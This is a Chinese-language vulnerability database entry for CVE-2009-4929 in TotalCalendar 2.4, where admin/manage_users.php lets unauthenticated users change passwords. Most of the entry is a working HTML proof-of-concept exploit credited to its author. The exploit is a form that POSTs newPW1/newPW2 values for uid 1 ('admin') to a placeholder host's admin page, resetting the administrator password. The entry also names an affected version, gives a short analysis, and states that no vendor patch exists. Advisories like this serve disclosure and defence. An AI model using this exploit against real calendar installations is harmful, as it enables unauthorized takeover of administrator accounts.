TotalCalendar manage_users.php页面非授权更改口令漏洞

添加时间:
2010-07-13

系统编号:
WAVDB-01680
BugCVE: CVE-2009-4929
BUGTRAQ: 34619

影响版本:
TotalCalendar 2.4

程序介绍:

TotalCalendar是一种基于Web的日程管理系统。

漏洞分析:

TotalCalendar的admin/manage_users.php页面没有强制管理认证，远程用户可以通过在HTTP请求中包含newPW1和newPW2参数任意更改口令。

漏洞利用:

<title> Powered by: TotalCalendar 2.4 Remote Password Change </title>
<tr align="left">
<td width="10"> </td>
<td align="center"><span class="boxHeader">Cod[3]d By ThE g0bL!N</span></td>
<td width="10" align="right"></td>
</tr>
</table></span></td>
</tr>
</table>
</td>
</tr>
<tr>
<td style="padding: 0px;">
<table width="100%" height="100%" cellspacing="0" style="padding: 0px;">
<tr>
<td height="100%" style="padding: 0px;">
<div align="left" id="25_content_area" style="">
<script language="javascript">
// Should we show the pw changing fields or not
function pwChanger(bool)
{
if(bool)
{
// Show password changer
document.getElementById('pwChange').style.display = "none";
document.getElementById('pwDontChange').style.display = "";
document.getElementById('pwChangerArea').style.display = "";
document.getElementById('changePW').value = 1;
}
else
{
// Hide password changer
document.getElementById('pwChange').style.display = "";
document.getElementById('pwDontChange').style.display = "none";
document.getElementById('pwChangerArea').style.display = "none";
document.getElementById('changePW').value = 0;
}
}
</script>
<br /<br /><br /><form method="POST" action="http://www.example.com/calendar/admin/manage_users.php"><input type="hidden" name="action" value="Save" /><input id="changePW" type="hidden" name="changePW" value="0" /><input type="hidden" name="uid" value="1" />
<table align="center">
<tr>
<td align="right" valign="top"><b>First Name:</b></td>
<td> </td>
<td align="left" valign="top"><input name="fname" value="Dos-Dz" size="33" /></td>
</tr>
<tr>
<td align="right" valign="top"><b>Last Name:</b></td>
<td> </td>
<td align="left" valign="top"><input name="lname" value="admin" size="33" /></td>
</tr>
<tr>
<td colspan="3"> </td>
</tr>
<tr>
<td align="right" valign="top"><b>Username:</b></td>
<td> </td>
<td align="left" valign="top"><input name="username" value="admin" size="25" /></td>
</tr>
<tr>
<td align="right" valign="top"><b>Email Address:</b></td>
<td> </td>
<td align="left" valign="top"><input name="email" value="x0q@hotmail.fr" size="40" /></td>
</tr>
<tr>
<td colspan="3"> </td>
</tr>
<tr id="pwChange">
<td align="right" valign="top"> </td>
<td> </td>
<td align="left" valign="top"><a class="smallLinkText" onClick="pwChanger(true);" title="Click here to reset user's passord..." style="cursor: pointer;">Reset Password</a></td>
</tr>
<tr id="pwDontChange" style="display: none;">
<td align="right" valign="top"> </td>
<td> </td>
<td align="left" valign="top"><a class="smallLinkText" onClick="pwChanger(false);" title="Don't reset user's password password..." style="cursor: pointer;">Do Not Reset Password</a></td>
</tr>
<tr>
<td colspan="3"> </td>
</tr>
<tr id="pwChangerArea" style="display: none;">
<td colspan="3">
<table width="100%">
<tr>
<td align="right" valign="top"><b>New Password:</b></td>
<td> </td>
<td align="left" valign="top"><input type="password" name="newPW1" size="20" /></td>
</tr>
<tr>
<td align="right" valign="top"><b>Confirm New Password:</b></td>
<td> </td>
<td align="left" valign="top"><input type="password" name="newPW2" size="20" /></td>
</tr>
<tr>
<td colspan="3"> </td>
</tr>
</table>
</td>
</tr>
<tr>
<td colspan="3" align="center"><input type="submit" name="action" value="Save" /> <input type="submit" name="action" value="Cancel" /></td>
</tr>
</table></form><br /></div></td>

解决方案:
厂商补丁：
SweetPHP
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://sweetphp.com/nuke/modules ... t_Preview&script=12

信息来源:
<*来源：ThE g0bL!N
链接：http://secunia.com/advisories/34824
*>

漏洞列表